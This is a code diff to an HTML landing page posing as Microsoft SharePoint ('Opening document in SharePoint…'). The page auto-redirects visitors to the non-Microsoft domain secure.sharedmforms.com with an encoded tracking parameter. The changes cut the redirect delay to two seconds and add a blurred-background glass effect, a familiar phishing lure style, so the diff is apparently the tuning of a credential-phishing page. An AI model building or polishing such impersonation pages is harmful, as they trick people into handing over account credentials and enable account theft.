--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
   <title>Opening document in SharePoint…</title>
   <meta name="viewport" content="width=device-width, initial-scale=1" />
 
-  <!-- Auto redirect after 5 seconds -->
+  <!-- Auto redirect after 2 seconds -->
   <script>
     setTimeout(function () {
       window.location.href = "https://secure.sharedmforms.com/?aCXefF=NjE4MDkyZGQ2ZTZlNDNhODkzNzVjNmRmZmE3Yzk1YTk%3D&84K5B=E1aHz";
@@ -22,7 +22,11 @@
     body {
       margin: 0;
       font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Arial, sans-serif;
-      background: #f3f4f6;
+
+      /* ✅ BLUR BACKGROUND ADDED HERE */
+      background: url("blur-bg.png") center/cover no-repeat fixed;
+      backdrop-filter: blur(4px);
+
       color: #111827;
       display: flex;
       align-items: center;
@@ -31,13 +35,14 @@
     }
 
     .card {
-      background: #ffffff;
+      background: rgba(255, 255, 255, 0.92); /* Slight transparency to blend with blurred bg */
       max-width: 480px;
       width: 100%;
       padding: 32px 28px 26px;
       border-radius: 14px;
-      box-shadow: 0 14px 35px rgba(15, 23, 42, 0.18);
+      box-shadow: 0 14px 35px rgba(15, 23, 42, 0.25);
       text-align: center;
+      backdrop-filter: blur(6px); /* Smooth glass effect */
     }
 
     .sp-logo img {
@@ -116,14 +121,13 @@
       font-size: 0.78rem;
       color: #9ca3af;
     }
+
   </style>
 </head>
 <body>
   <div class="card">
 
-    <!-- SharePoint logo from your repo -->
     <div class="sp-logo">
-      <!-- Make sure sharepoint-logo.png is in the SAME folder as index.html -->
       <img src="sharepoint-logo.png" alt="SharePoint Logo" />
     </div>
 
